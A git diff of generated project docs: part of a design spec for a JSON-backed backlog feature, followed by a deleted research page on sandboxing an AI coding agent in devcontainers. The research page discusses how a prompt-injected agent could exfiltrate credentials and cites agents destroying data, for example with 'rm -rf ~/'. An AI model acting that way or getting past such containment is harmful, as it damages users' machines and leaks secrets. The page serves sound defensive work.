  • -
  • Per-feature backlogs and a global↔per-feature promotion path.
  • -
  • A status/workflow state machine; an audit trail for removed entries (manual remove is a plain delete in v1).
  • -
  • /pm-sync of backlog entries before promotion; cross-project/multi-repo backlogs.
  • -
  • Reordering UX beyond editing the order field; multi-writer locking (single-writer assumption — see §6 N1).
  • -
-

§4 Product Journey {#product-journey}

-

Backend interpretation — the representative paths exercised by the change:

-
    -
  1. Capture (user). /backlog add "<text>" → capture() assigns a uuid4 id and the next integer order, prompts for / accepts a feature + epic (proposed-new allowed), writes the full doc to backlog.json.tmp, then os.replace() → backlog.json.
  2. -
  3. Capture (agent). A Shield skill mid-task calls -capture(text, kind=…, feature=…, epic=…, source="agent") and receives the entry id. -Same atomic write; never blocks the current task.
  4. -
  5. View. /backlog reads backlog.json (validate-or-refuse), sorts by order, and for each entry looks up its feature in manifest.json to render research ✓ prd ✓ plan – style badges. A lazy reconciliation sweep runs over all entries before rendering, unless the kill switch disables it (backlog.auto_reconcile = false).
  6. -
  7. Promote. /backlog promote <id> launches the user-chosen Shield step and forwards -<id> as a transient runtime reference (never stamped into plan.json).
  8. -
  9. Reconcile / prune. At the end of a promoted /plan or /implement run, if the run -carried a promotion reference, the entry is pruned (eager). The /backlog view sweep is -the lazy safety net. Both call the one reconciliation engine and log every removal.
  10. -
  11. Manual remove. /backlog remove <id> plain-deletes an entry (confirm-before-delete); -git revert recovers it only if it had reached a commit.
  12. -
-
flowchart LR
-  add["/backlog add (user)"] --> store["backlog.json (atomic write)"]
-  skill["capture() (agent)"] --> store
-  store --> view["/backlog view\n(ordered + status badges)"]
-  man["manifest.json"] --> view
-  view --> promote["/backlog promote <id>\n(transient reference)"]
-  promote --> step["/research | /prd | /plan | /implement"]
-  step --> recon["reconciliation engine"]
-  view -. lazy sweep .-> recon
-  recon --> store
-
-
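The capture path in steps 1 and 2 can be sketched as follows. This is a minimal illustration, not the shipped backlog_store: the `store` path parameter, the starting `schema_version` value of 1, and the choice to start `order` at 1 are assumptions made for the example; the entry fields and the temp-then-`os.replace()` sequence follow the text above.

```python
import json
import os
import uuid
from pathlib import Path


def capture(store: Path, text: str, *, kind: str = "task",
            feature=None, epic=None, source: str) -> str:
    """Append one entry to the backlog and return its id (illustrative sketch)."""
    # Load the current document, or start an empty one.
    # Assumption: schema_version starts at 1.
    if store.exists():
        doc = json.loads(store.read_text(encoding="utf-8"))
    else:
        doc = {"schema_version": 1, "entries": []}

    entry_id = str(uuid.uuid4())
    # Next integer order: one past the current maximum (1 for an empty backlog).
    next_order = max((e["order"] for e in doc["entries"]), default=0) + 1
    doc["entries"].append({
        "id": entry_id, "order": next_order, "kind": kind, "source": source,
        "feature": feature, "epic": epic, "text": text,
    })

    # Write the full document to a sibling temp file, then rename it over the
    # store, so a kill mid-write leaves at most a stray .tmp file.
    tmp = store.with_name(store.name + ".tmp")
    tmp.write_text(json.dumps(doc, indent=2), encoding="utf-8")
    os.replace(tmp, store)
    return entry_id
```

A user capture would then look like `capture(Path("docs/shield/backlog.json"), "handle X later", source="user")`, and a skill would pass `source="agent"`.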

§5 Functional Requirements {#functional-requirements}

-

Backend interpretation — each item is a verifiable behavior:

-
    -
  • F1. backlog.json validates against shield/schema/backlog.schema.json; an entry -with an unknown kind (∉ {epic, story, task}) or source (∉ {user, agent}) is rejected -with a named error.
  • -
  • F2. Entry id is a uuid4 string; the validator (validate_backlog.py) rejects an -entries[] array containing duplicate id values with the named error duplicate_entry_id. -(JSON Schema draft 2020-12 uniqueItems is whole-item equality and cannot express -property-level uniqueness, so this check lives in the validator, not the schema.)
  • -
  • F3. capture(text, *, kind="task", feature=None, epic=None, source) -> str appends one -entry, assigns the next integer order and a fresh uuid4 id, and returns that id. It is -callable from /backlog add (source=user) and from any skill (source=agent).
  • -
  • F4. All writes are atomic: full document → backlog.json.tmp → os.replace(). A kill mid-write never leaves a corrupt backlog.json (at most a stray .tmp).
  • -
  • F5. Reads are validate-or-refuse: a malformed/partial backlog.json raises -BacklogInvalid (named error), never a silent truncation or partial parse.
  • -
  • F6. Promotion forwards the entry id as a transient runtime reference only; neither -plan.json nor any story record is mutated by promotion (the no-stamping trust boundary).
  • -
  • F7. Feature/epic suggestion uses exact normalized match (casefold() + collapsed -whitespace) by name, for both existing and proposed-new epics. No fuzzy/token-overlap -ranking. A tie (≥2 normalized matches) surfaces all tied candidates and auto-picks none; -no match → the entry is captured proposed-new.
  • -
  • F8. The "epic landed" predicate (single source of truth, used by every removal path): an entry is removed iff an epic with the matching normalized-exact name is present in plan.json.epics[]. The match is by name, not by the positional EPIC-N id: EPIC-N is a within-a-single-plan slot reassigned on every re-/plan, so it is not a stable cross-plan key (an epic reordered across a re-plan must still resolve by name). Story status is never consulted; a prd-only feature is never removed; ambiguity or no match → the entry stays.
  • -
  • F9. Eager prune (end of promoted /plan|/implement) and lazy sweep (/backlog view) -are idempotent (remove-if-present) and call the same reconciliation engine. Every removal -emits a structured log line: {entry id, feature, epic, match-kind (id|name), triggering run, gating plan.json path}.
  • -
  • F10. A .shield.json flag backlog.auto_reconcile (default true) disables both -eager prune and lazy sweep when false, leaving manual remove functional.
  • -
-
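The matching rules in F7 and F8 can be sketched in a few lines. This is an illustration under stated assumptions: the function names are hypothetical, and the sketch assumes each item in `plan.json` `epics[]` carries its display name under a `name` key, which the text above does not confirm. Unrecognized shapes are treated as doubt, in the spirit of "ambiguity or no match → the entry stays".

```python
def normalize(name: str) -> str:
    """casefold() plus collapsed whitespace, as described in F7."""
    return " ".join(name.casefold().split())


def suggest(query: str, candidates: list[str]) -> list[str]:
    """Return every candidate whose normalized name equals the query's.

    An empty result means the entry is captured proposed-new; two or more
    results are a tie that the caller surfaces without auto-picking.
    """
    key = normalize(query)
    return [c for c in candidates if normalize(c) == key]


def epic_landed(entry_epic: str, plan: object) -> bool:
    """F8-style predicate: True only when exactly one epic name matches."""
    # Any shape we do not recognize counts as doubt, so the entry stays.
    if not isinstance(plan, dict) or not isinstance(plan.get("epics"), list):
        return False
    # Assumption: each epic is a dict with a "name" string.
    names = [e.get("name") for e in plan["epics"] if isinstance(e, dict)]
    key = normalize(entry_epic)
    matches = [n for n in names if isinstance(n, str) and normalize(n) == key]
    # Zero matches: not landed. Two or more: ambiguous, so never remove.
    return len(matches) == 1
```

Keeping the predicate free of any lookup by positional id is what lets an epic that moves slots across a re-plan still resolve.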

§6 Non-Functional Requirements {#non-functional-requirements}

-

Backend interpretation — measurable targets and guarantees:

-
    -
  • N1: Integrity under single-writer. Shield is single-actor (N5), so v1 assumes one writer: no lock. Correctness rests on full-doc → .tmp → os.replace() (atomic rename), validate-or-refuse reads, and a compare-before-replace check: capture()/remove() record the on-disk schema_version+entry-count (or mtime/hash) at read time and refuse the os.replace() (raising BacklogInvalid) if the file changed underneath. This converts a silent lost-update (the failure mode if N5 is violated) into a loud refusal without a lockfile. The concurrency eval (EPIC-4-S1) asserts the refusal fires and no entry is lost or corrupted. Multi-writer locking is deferred until Shield becomes multi-actor.
  • -
  • N2 — View latency. /backlog view + lazy sweep completes in ≲ 1s for a backlog of -≤ ~200 entries against a typical manifest.json. A debug-gated latency line reports actual -view+sweep wall time so "revisit if breached" is falsifiable rather than impressionistic.
  • -
  • N3 — Drift tolerance / no-crash. An unrecognized manifest.json / plan.json shape is -treated as doubt (entry stays) with a logged warning; reconciliation never raises on a -shape it doesn't recognize.
  • -
  • N4 — Recoverability. backlog.json is git-tracked; a wrong removal that reached a commit -is recoverable via git revert. For an end-of-run eager prune (which may fire before -backlog.json is committed), the v1 recovery mechanism is the transient append-only -.shield/backlog-removed.log: the pruned entry is appended before the destructive remove, -and replaying the log restores it. Commit-before-prune was considered and rejected as a v1 -non-goal (it would force a possibly-dirty-tree commit on every prune and couple recovery to git -state mid-/implement). A manual remove of an uncommitted entry is unrecoverable by design -(documented).
  • -
  • N5 — Single-actor assumption. The whole concurrency posture (N1) and the no-lock design -rest on Shield being driven by one actor at a time. This is stated as an assumption, not a -guarantee; if violated, N1's mitigation must be revisited.
  • -
-
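The append-before-remove recovery path in N4 might look like the sketch below. The one-JSON-object-per-line log format and both function names are assumptions for illustration; the text above only fixes the log's location and the ordering (append first, then remove).

```python
import json
from pathlib import Path


def log_then_remove(entries: list[dict], entry_id: str, log_path: Path) -> list[dict]:
    """Append the entry to the removal log, then return the entries without it."""
    victim = next((e for e in entries if e["id"] == entry_id), None)
    if victim is None:
        return entries  # remove-if-present: nothing to log, nothing to remove
    log_path.parent.mkdir(parents=True, exist_ok=True)
    # Append BEFORE the destructive step so the entry is never only in memory.
    with log_path.open("a", encoding="utf-8") as fh:
        fh.write(json.dumps(victim) + "\n")
    return [e for e in entries if e["id"] != entry_id]


def replay(log_path: Path) -> list[dict]:
    """Read back every logged entry so a wrong prune can be restored."""
    if not log_path.exists():
        return []
    with log_path.open(encoding="utf-8") as fh:
        return [json.loads(line) for line in fh if line.strip()]
```

Because a second removal of the same id is a no-op, the log gains at most one line per pruned entry, which keeps replay unambiguous.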

§7 High-Level Design {#high-level-design}

-

Backend interpretation — components and the data they exchange. Three Python -components plus the command/skill surface, all reading/writing the one store.

-
        ┌────────────────────────────────────────────────────────────┐
-        │  /backlog command  +  backlog SKILL.md  (add/view/remove/    │
-        │                       promote)                                │
-        └───────┬───────────────┬───────────────┬─────────────────────┘
-                │ capture()      │ view          │ promote(id)
-                ▼                ▼               ▼
-        ┌───────────────┐  ┌──────────────┐  (transient ref → /plan|/implement)
-        │ backlog-store │  │ epic-suggester│
-        │ (atomic R/W,  │  │ (manifest +   │
-        │  validate)    │  │  plan.json    │
-        │               │  │  exact-norm   │
-        │               │  │  match)       │
-        └──────┬────────┘  └──────┬────────┘
-               │ read/write       │ read
-               ▼                  ▼
-        ┌──────────────────────────────────────┐
-        │ docs/shield/backlog.json (ordered)    │
-        └──────────────────────────────────────┘
-               ▲                  ▲
-               │ remove-if-present│ read (epic-landed predicate, F8)
-        ┌──────┴────────┐         │
-        │  reconciler   │─────────┘  reads manifest.json (feature index)
-        │ (engine + eager│            + flagged plan.json (epics[])
-        │  prune + lazy  │
-        │  sweep + kill  │
-        │  switch + log) │
-        └────────────────┘
-
-
    -
  • backlog-store owns the store contract: schema, capture(), read (validate-or-refuse), -remove, atomic write. It is the only writer of backlog.json.
  • -
  • epic-suggester is read-only: given capture text + a candidate feature, it scans -manifest.json features and the feature's plan.json epics and returns exact-normalized -candidates (F7). It never writes.
  • -
  • reconciler holds the engine (F8 predicate + never-remove-on-doubt + drift tolerance + -removal logging) and the two triggers (eager prune, lazy sweep) gated by the kill switch (F10). -It calls backlog-store to remove entries.
  • -
  • manifest.json is the feature index (does the feature exist? does it have a -plan.json?). plan.json.epics[] is the removal gate. No ids are stamped into either.
  • -
-

§8 Alternatives Considered {#alternatives-considered}

-
    -
  1. Stamp a backlog-entry id into plan.json / story records at promotion. Would make reconciliation a trivial id lookup. Rejected: it couples the pre-pipeline staging area into the committed plan format (a schema change to plan.json), pollutes the PM-sync surface, and breaks the "no ids tracked" PRD decision. Matching on feature (manifest) + normalized epic name (plan) keeps the backlog a pure overlay (F6/F8).
  2. -
  3. Per-feature backlogs (a backlog.json per docs/shield/<feature>/). Rejected for v1: -the dominant capture moment is "future work with no feature yet," so a global store with a -proposed-new feature association fits the actual flow; per-feature adds a global↔local -promotion path with no v1 payoff.
  4. -
  5. A status/workflow state machine (captured → triaged → promoted → done). Rejected: -the lifecycle is minimal — an entry exists until removed (promotion-prune, sweep, or manual). -A state machine is unmeasurable scope creep against the §7 success metric.
  6. -
  7. A project-level epic index to avoid opening plan.json files during reconciliation. -Rejected for v1 (kept as PRD §9 open question): manifest.json-as-index + opening only -flagged plan.json files is simpler and within the N2 budget; add the index only if N2 is -breached (the debug latency line makes that decision data-driven).
  8. -
  9. A lockfile for concurrent writes. Rejected for v1: the single-actor assumption (N5) -makes atomic-rename + validate-or-refuse sufficient (N1); a lock is dead weight until Shield -is multi-actor.
  10. -
-
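As a companion to alternative 5, the compare-before-replace check that N1 uses in place of a lockfile could be sketched like this. It is an illustration only: the sketch picks a content hash from the options N1 lists, the helper names are hypothetical, and `BacklogInvalid` is declared here as a bare placeholder for the named error.

```python
import hashlib
import json
import os
from pathlib import Path


class BacklogInvalid(Exception):
    """Placeholder for the named error the TRD refers to."""


def fingerprint(store: Path) -> str:
    """Hash of the on-disk bytes, recorded when the store is read."""
    return hashlib.sha256(store.read_bytes()).hexdigest()


def guarded_write(store: Path, doc: dict, seen: str) -> None:
    """Replace the store only if it still matches the fingerprint from read time."""
    tmp = store.with_name(store.name + ".tmp")
    tmp.write_text(json.dumps(doc, indent=2), encoding="utf-8")
    if fingerprint(store) != seen:
        tmp.unlink()  # refuse loudly instead of overwriting someone else's change
        raise BacklogInvalid("backlog.json changed since it was read")
    os.replace(tmp, store)
```

A small window remains between the comparison and the rename, so this narrows the lost-update case rather than eliminating it; that is consistent with treating single-actor use as an assumption, not a guarantee.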

§9 Cross-Cutting Concerns {#cross-cutting-concerns}

-
    -
  • Validation. One schema (backlog.schema.json) + one validator (validate_backlog.py) -gate every read and the eval suite. Validate-or-refuse is the single integrity primitive.
  • -
  • Logging. Two logged surfaces: (a) every reconciliation removal with rationale -(F9 structured line), and (b) every never-remove-on-doubt decision (N3 warning). Removals are -never a silent git diff.
  • -
  • Configuration. .shield.json gains backlog.auto_reconcile (bool, default true) — the -kill switch (F10). No secrets; the store is plaintext JSON, git-tracked.
  • -
  • Schema evolution. schema_version is set in v1 so future shape changes (priority buckets, -audit trail) migrate read-old/write-new. v1 ships no live migrate() code — the policy is -documented only (doc-only until schema_version 2), to avoid mistaking documentation for -working code.
  • -
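  • Recovery. N4 governs the destructive paths: git revert for a removal that reached a commit, and the append-only .shield/backlog-removed.log for an end-of-run eager prune (commit-before-prune was considered and rejected); manual-remove-of-uncommitted is unrecoverable by design.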
  • -
-
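Reading the kill switch described under Configuration could be as small as the sketch below. The function name is hypothetical, and two behaviors are assumptions rather than stated requirements: a missing `.shield.json` is treated as "enabled", and only a literal `false` disables reconciliation.

```python
import json
from pathlib import Path


def auto_reconcile_enabled(config_path: Path) -> bool:
    """Return backlog.auto_reconcile from .shield.json, defaulting to True."""
    try:
        cfg = json.loads(config_path.read_text(encoding="utf-8"))
    except FileNotFoundError:
        return True  # assumption: no config file means the default applies
    backlog = cfg.get("backlog", {}) if isinstance(cfg, dict) else {}
    value = backlog.get("auto_reconcile", True) if isinstance(backlog, dict) else True
    # Assumption: only an explicit JSON false turns reconciliation off.
    return value is not False
```

Both the eager prune and the lazy sweep would consult this one function before calling the reconciliation engine, while manual remove would not.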

§10 Milestones {#milestones}

-

The ship plan below is rendered from plan.json milestones[] — it is the structured -source of truth. Do not hand-edit the region between the markers; edit plan.json and re-run -/plan to refresh it. Exit criteria tie back to §5 (F1–F10) and §6 (N1–N5).

- -

M1 — Capture + store + view (no deps)

-

Outcome: A global docs/shield/backlog.json exists; entries can be added (user + agent) with order, kind, source, and a feature + epic association; /backlog renders the ordered list with per-entry pipeline status from manifest.json; an entry can be manually removed.

-

Exit criteria:

-
    -
  • backlog.json has a documented JSON Schema with a top-level schema_version and per-entry {id, order, kind, source, feature, epic, text}; ids are unique across entries[]; shield/scripts/validate_backlog.py exits 0 on valid and non-zero with a named error on invalid.
  • -
  • An entry can be captured both from the user (/backlog add) and from a Shield skill via the documented write helper; the write is atomic (temp-then-rename) and validate-or-refuse.
  • -
  • /backlog renders entries in order with each entry's feature + epic and a research/prd/plan status read from manifest.json.
  • -
  • /backlog can remove an entry by id (plain delete; no retained history).
  • -
-
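The id-uniqueness exit criterion is the one check the schema alone cannot express, so it lives in the validator. A minimal sketch of that check follows; the function name and the error-string layout are assumptions, and only the `duplicate_entry_id` error name comes from the TRD.

```python
from collections import Counter


def check_unique_ids(doc: dict) -> list[str]:
    """Return one named error per id that appears more than once in entries[]."""
    ids = [entry["id"] for entry in doc.get("entries", [])]
    duplicates = sorted(i for i, count in Counter(ids).items() if count > 1)
    return [f"duplicate_entry_id: {i}" for i in duplicates]
```

A validator script built on this would exit 0 when the returned list is empty and non-zero otherwise, printing each named error.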

M2 — Feature + epic association + suggestion (deps M1)

-

Outcome: Every entry references a feature and an epic (existing or proposed-new); the agent suggests a matching feature/epic by scanning manifest.json features and plan.json epics, and the user can accept, pick another, or create-new.

-

Exit criteria:

-
    -
  • Capture prompts for (or accepts) a feature + epic; both may be proposed-new.
  • -
  • The agent proposes >=1 candidate feature (from manifest.json) and >=1 candidate epic (from the feature's plan.json) using exact-normalized match; the user can accept/replace/create-new.
  • -
  • Suggestion never blocks capture — an entry can be captured with a proposed-new feature/epic when no match exists; a normalized-name tie surfaces all tied candidates and auto-picks none.
  • -
-
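The exact-normalized match and the tie rule above can be sketched as follows. This is an illustration only: `normalize_name` and `suggest` are hypothetical names, and the normalization (casefold plus collapsed whitespace) is assumed to be the same one the M3 match key uses.

```python
def normalize_name(name: str) -> str:
    """Casefold and collapse runs of whitespace to single spaces."""
    return " ".join(name.casefold().split())


def suggest(query: str, candidates: list[str]) -> list[str]:
    """Return every candidate whose normalized name equals the query's.

    An empty list means no match: the caller falls back to proposed-new,
    so capture is never blocked. More than one result is a tie: the caller
    shows all tied candidates and auto-picks none.
    """
    key = normalize_name(query)
    return [c for c in candidates if normalize_name(c) == key]
```

Returning a list rather than a single best guess keeps the "auto-picks none" rule in the caller's hands.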

M3 — Promotion + reconciliation (deps M2)

-

Outcome: The user promotes an entry by starting /research, /prd, /plan, or /implement from it; the entry is removed when its work commits — eagerly at the end of the promoted /plan or /implement run, lazily on the /backlog sweep, or manually. Reconciliation matches by feature (manifest) + epic (plan.json) and never removes on doubt.

-

Exit criteria:

-
    -
  • Promoting an entry passes it as a transient reference to /plan or /implement; on success that entry is pruned (eager).
  • -
  • The /backlog sweep removes any entry whose epic's work now appears in the feature's plan.json (lazy safety net); a prd-only feature is NOT removed.
  • -
  • Match key: both existing and proposed-new entries match by casefold+collapsed-whitespace exact epic NAME (never by positional epic id); on ambiguity or no match the entry stays.
  • -
  • Eager prune and lazy sweep are idempotent (remove-if-present), share one reconciliation engine, log every removal with rationale, and treat an unrecognized manifest.json/plan.json shape as doubt (entry stays), never crashing.
  • -
  • A .shield.json kill switch (backlog.auto_reconcile=false), made schema-valid by an additive 'backlog' object in shield.schema.json, disables eager prune and lazy sweep, leaving manual-remove only.
  • -
  • An executable eval exercises capture (user + skill), view+status, manual remove, eager prune, lazy sweep, match-key, never-remove-on-doubt, concurrency (no lost entry), no-stamping (F6), and recovery-rehearsal with a RED->GREEN trail; the Shield plugin version is bumped per CLAUDE.md.
  • -
- -

§11 APIs Involved {#apis-involved}

-

Backend interpretation: the interface surface. Component-internal detail lives in the LLD drafts; this is the boundary contract.

-

backlog.json document shape

-
{
-  "schema_version": 1,
-  "entries": [
-    {
-      "id": "f47ac10b-58cc-4372-a567-0e02b2c3d479",  // uuid4 string, unique across entries[]
-      "order": 10,                                     // integer; ascending = view order
-      "kind": "epic",                                  // enum: epic | story | task
-      "source": "agent",                               // enum: user | agent
-      "feature": "billing-retries",                    // feature folder slug (proposed-new allowed)
-      "epic": "EPIC-2",                                // epic id (existing) or name (proposed-new)
-      "text": "Add exponential backoff to webhook retries"
-    }
-  ]
-}
-
-

backlog_store write helper (LOCKED — plan-review 2026-05-27)

-
def capture(
-    text: str,
-    *,
-    kind: str = "task",          # epic | story | task
-    feature: str | None = None,  # None ⇒ prompt / proposed-new at capture
-    epic: str | None = None,
-    source: str,                 # user | agent  (required, keyword-only)
-) -> str:                        # returns the new entry's uuid4 id
-    """Append one entry atomically. Raises BacklogInvalid on a malformed/partial store."""
-
-

Every capturing skill builds against this signature. Companion store operations: read() -> dict (validate-or-refuse, raises BacklogInvalid), remove(entry_id) -> bool (remove-if-present, idempotent).

-

CLI surface (/backlog)

- - - - - - - - - - - - - - - - - - - - - - - - - -
| Command | Behavior |
| --- | --- |
| /backlog | View ordered list + per-entry feature/epic/source + manifest status badges; runs the lazy sweep unless the kill switch is set (backlog.auto_reconcile=false). |
| /backlog add "<text>" | capture(..., source="user"); prompts for feature + epic with agent suggestion. |
| /backlog remove <id> | Confirm, then plain-delete (remove(id)). |
| /backlog promote <id> | Launch the user-chosen step; forward <id> as a transient reference (no stamping). |
-

manifest.json read-contract (consumed, not owned)

-

The backlog reads, and never writes, the existing manifest.json. Its real shape is pinned here so EPIC-2-S1 (status badges) and EPIC-3-S2 (reconciliation) build against ground truth rather than reverse-engineering the live file:

-
{
-  "schema_version": 2,
-  "features": [                       // a LIST keyed by name, not a feature-keyed map
-    {
-      "name": "billing-retries",      // == the docs/shield/<feature>/ folder slug (invariant)
-      "artifacts": {                  // booleans, not paths
-        "research": false,
-        "prd": true,
-        "plan_json": true,            // the flag the reconciler gates "has a plan?" on
-        "plan_md": true,
-        "plan_arch_md": false
-      },
-      "reviews": { /* ... */ },
-      "updated": "2026-05-29T00:00:00+00:00"
-    }
-  ]
-}
-
-

Key facts the components rely on: features is a list keyed by name; name is the feature folder slug (the reconciliation key); artifacts.plan_json is a boolean flag, and the manifest does not store a plan path, so the reconciler derives docs/shield/<name>/plan.json.
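The path derivation described above can be sketched as follows. This is a sketch, not the reconciler's actual code: `flagged_plan_paths` is a hypothetical name, and returning an empty map on an unrecognized manifest shape is an assumption in the spirit of "treat doubt as stay".

```python
from pathlib import Path


def flagged_plan_paths(manifest: dict, root: Path = Path("docs/shield")) -> dict[str, Path]:
    """Map feature slug -> derived plan.json path for features flagged plan_json."""
    features = manifest.get("features")
    if not isinstance(features, list):
        return {}  # unrecognized shape: report nothing rather than crash
    paths: dict[str, Path] = {}
    for feature in features:
        if not isinstance(feature, dict):
            continue
        name = feature.get("name")
        artifacts = feature.get("artifacts")
        # The manifest stores a boolean flag, not a path, so the path is derived.
        if isinstance(name, str) and isinstance(artifacts, dict) and artifacts.get("plan_json") is True:
            paths[name] = root / name / "plan.json"
    return paths
```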

-

reconciler engine entry point

-

reconcile(entry, *, manifest: dict, plans: dict[str, dict]) -> RemovalDecision applies the F8 "epic landed" predicate. manifest is the parsed document above; plans is a {feature-slug → parsed plan.json} map the trigger populates by reading docs/shield/<slug>/plan.json for each feature whose artifacts.plan_json == true. Returns REMOVE / STAY_AMBIGUOUS / STAY_NO_MATCH / STAY_DOUBT, each carrying the rationale fields for the F9 log line ({entry id, feature, epic, match-kind, triggering run, gating plan.json path}). Pure function over already-read documents (testable without IO).
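A pure-function reconciler of this shape might look like the sketch below. Several parts are assumptions, not the locked design: plan.json is assumed to hold `{"epics": [{"name": ...}]}`, the entry's `epic` field is assumed to carry an epic name, the F8 predicate is approximated as "exactly one epic with the same normalized name", and `Outcome` plus the reduced `RemovalDecision` fields are hypothetical.

```python
from dataclasses import dataclass
from enum import Enum


class Outcome(Enum):
    REMOVE = "remove"
    STAY_AMBIGUOUS = "stay_ambiguous"
    STAY_NO_MATCH = "stay_no_match"
    STAY_DOUBT = "stay_doubt"


@dataclass(frozen=True)
class RemovalDecision:
    outcome: Outcome
    entry_id: str
    feature: str
    epic: str


def _norm(name: str) -> str:
    """Casefold and collapse whitespace (the match key)."""
    return " ".join(name.casefold().split())


def reconcile(entry: dict, *, manifest: dict, plans: dict[str, dict]) -> RemovalDecision:
    """Decide from already-parsed documents only; no file IO happens here."""
    def decide(outcome: Outcome) -> RemovalDecision:
        return RemovalDecision(outcome, entry["id"], entry["feature"], entry["epic"])

    try:
        flagged = {
            f["name"] for f in manifest["features"] if f["artifacts"]["plan_json"] is True
        }
        if entry["feature"] not in flagged:
            return decide(Outcome.STAY_NO_MATCH)  # e.g. a prd-only feature
        epic_names = [e["name"] for e in plans[entry["feature"]]["epics"]]
        hits = [n for n in epic_names if _norm(n) == _norm(entry["epic"])]
    except (KeyError, TypeError, AttributeError):
        return decide(Outcome.STAY_DOUBT)  # unrecognized shape: the entry stays
    if len(hits) == 1:
        return decide(Outcome.REMOVE)
    return decide(Outcome.STAY_AMBIGUOUS if hits else Outcome.STAY_NO_MATCH)
```

Because the function only reads its arguments, the never-remove-on-doubt cases can be tested with literal dictionaries and no fixtures on disk.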

-

§12 Open Questions {#open-questions}

-
    -
  1. Feature/epic discovery cost (PRD §9). Confirming a proposed-new epic means opening the plan.json the manifest flags as having one. Lean: manifest-as-index, open only flagged plans; add a project-level epic index only if N2 is breached. Resolve-by: after M1, from the N2 debug latency line.
  2. Dropped/rejected terminal state (PRD §9). Is plain-delete enough, or do we need an explicit "decided against" state? Resolve-by: deferred to post-v1 (PRD §11 out-of-scope); revisit if the §7 metric shows entries being silently deleted rather than promoted.
  3. Capture-from-skill interface: closed by F3 / EPIC-1-S2 (the capture() signature is locked).
-

§13 References {#references}

- -

§14 Rollback Strategy {#rollback-strategy}

-

Backend interpretation: the change is additive (new store, new command, new scripts) and ships behind observable triggers.

-

Steps to undo:

-
    -
  1. Disable reconciliation without uninstalling: set .shield.json backlog.auto_reconcile = false (F10). Eager prune and lazy sweep stop; manual remove and capture/view still work. This is the first-line mitigation for a misbehaving reconciler.
  2. Recover a wrongly-removed entry: replay it from .shield/backlog-removed.log (the v1 recovery mechanism, appended before every destructive prune per N4), or git revert the commit that dropped it if the removal had already been committed.
  3. Full feature back-out: revert the feature PR, which removes /backlog, the scripts, and the schema. backlog.json itself is plain data; deleting it loses only captured entries (which are recoverable from git history while the file was tracked).
-

Triggers (observable):

-
    -
  • Reconciliation removes an entry whose work is not in any plan.json (a confident-but-wrong removal), surfaced by the F9 removal log → flip the kill switch, then git revert.
  • -
  • /backlog view+sweep exceeds the N2 ~1s budget (debug latency line) → flip the kill switch and evaluate the project-level epic index (§12 Q1).
  • -
  • The eval suite (EPIC-4-S1) regresses on concurrency/no-lost-entry, no-stamping (F6), or never-remove-on-doubt → block release / revert the offending change.
  • -
- -
-
Generated by Shield
- - diff --git a/docs/shield/devcontainer-implement-20260518/outputs/research.html b/docs/shield/devcontainer-implement-20260518/outputs/research.html deleted file mode 100644 index 3a22c98b..00000000 --- a/docs/shield/devcontainer-implement-20260518/outputs/research.html +++ /dev/null @@ -1,324 +0,0 @@ - - - - - -Research — devcontainer-implement-20260518 - - - - - - -
- 🛡 Shield - | - - -
- -
- -
-
-
-
-
- - -

Isolating Claude Code for /implement-style autonomous work

-

Status: Proposed
Date: 2026-05-18
Context: Shield's /implement runs TDD-style feature implementation: it writes tests, runs builds and package installs, executes test suites, and commits. We need a recommended isolation pattern that protects the host machine and the developer's Claude credentials without making the developer experience painful. Local-only scope (no cloud/CI for this iteration).

-

Decision

-

Adopt the two-boundary devcontainer pattern that Anthropic, Cursor, OpenAI Codex, Gemini CLI, and GitHub Copilot Coding Agent have all converged on:

-
    -
  1. Filesystem isolation: bind-mount only the workspace (read-write) and nothing else from the host. No ~/.ssh, no ~/.aws, no ~/.claude bind-mount. Run as a non-root user inside the container.
  2. Network egress isolation: default-deny outbound, allowlist only the endpoints /implement actually needs (Anthropic API, GitHub, and the npm/PyPI/etc. registries the project uses). Implement via iptables+ipset inside the container, run from postStartCommand with capAdd: [NET_ADMIN, NET_RAW].
  3. Credentials live in a named Docker volume keyed by ${devcontainerId}, not bind-mounted from the host. The user logs into Claude (claude /login) the first time the devcontainer is opened; credentials persist across container rebuilds but never appear in any host-side file the agent can read.
-

This is the same pattern Anthropic ships in anthropics/claude-code/.devcontainer/. Shield's contribution is a scaffolder that generates this pattern per-repo, with a Shield-owned firewall script (named to avoid the upstream Feature naming collision documented in claude-code issue #32113).

-

Why not the alternatives?

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
| Alternative | Why not |
| --- | --- |
| Bind-mount host ~/.claude/.credentials.json read-only (what the brainstorm was trending toward) | Industry consensus is the opposite. Anthropic's reference, Solberg's widely-cited write-up, and streamingfast/sbox all keep host creds off the mount path. The cost (one extra claude /login per project) is one-time and worth it. |
| No network firewall, "we'll do it later" | Egress is the single highest-leverage control. Willison: "Controlling network access cuts off the data exfiltration leg of the lethal trifecta." Anthropic Engineering: "Without network isolation, a compromised agent could exfiltrate sensitive files." Shipping without it leaves the most-cited attack vector wide open. |
| Run on host, gated by --dangerously-skip-permissions + hooks | Steve Yegge tried this and lost two days to an agent that erased passwords. Multiple rm -rf ~/ incidents on bare-metal Claude Code in late 2025. Anthropic itself annotates its YOLO-mode loop snippet with "(Run this in a container, not your actual machine.)" |
| microVM (Firecracker / gVisor / Edera) from day one | Overkill for local single-developer scope. Gemini CLI documents gVisor as its strongest tier; we can call this out as a future upgrade path for adversarial threat models (running untrusted PR diffs). For now, container + egress firewall is the industry-standard pragmatic point. |
| Container plus host bind-mount of secrets | The PocketOS / Cursor-Opus 9-second prod wipe and the Replit prod DB wipe both involved containerized agents with access to long-lived production tokens. Containment of the agent doesn't help if you also hand it credentials with blast-radius beyond the container. |
-

What the industry recommends

-

Anthropic Engineering (canonical source)

-
-

"Effective sandboxing requires both filesystem and network isolation. Without network isolation, a compromised agent could exfiltrate sensitive files like SSH keys; without filesystem isolation, a compromised agent could easily escape the sandbox and gain network access." -— Claude Code Sandboxing

-
-
-

"While the dev container provides substantial protections, no system is completely immune to all attacks. When executed with --dangerously-skip-permissions, dev containers do not prevent a malicious project from exfiltrating anything accessible inside the container, including the Claude Code credentials stored in ~/.claude. Only use dev containers when developing with trusted repositories... Avoid mounting host secrets such as ~/.ssh or cloud credential files into the container; prefer repository-scoped or short-lived tokens." -— Claude Code Docs — Development containers

-
-

Simon Willison (originator of "lethal trifecta" / prompt injection terminology)

-
-

"The only solution that's credible is to run coding agents in a sandbox." -"Controlling network access cuts off the data exfiltration leg of the lethal trifecta." -"Try to provide credentials to test or staging environments where any damage can be well contained. If a credential can spend money, set a tight budget limit." -— Living dangerously with Claude, The lethal trifecta for AI agents, Designing agentic loops

-
-

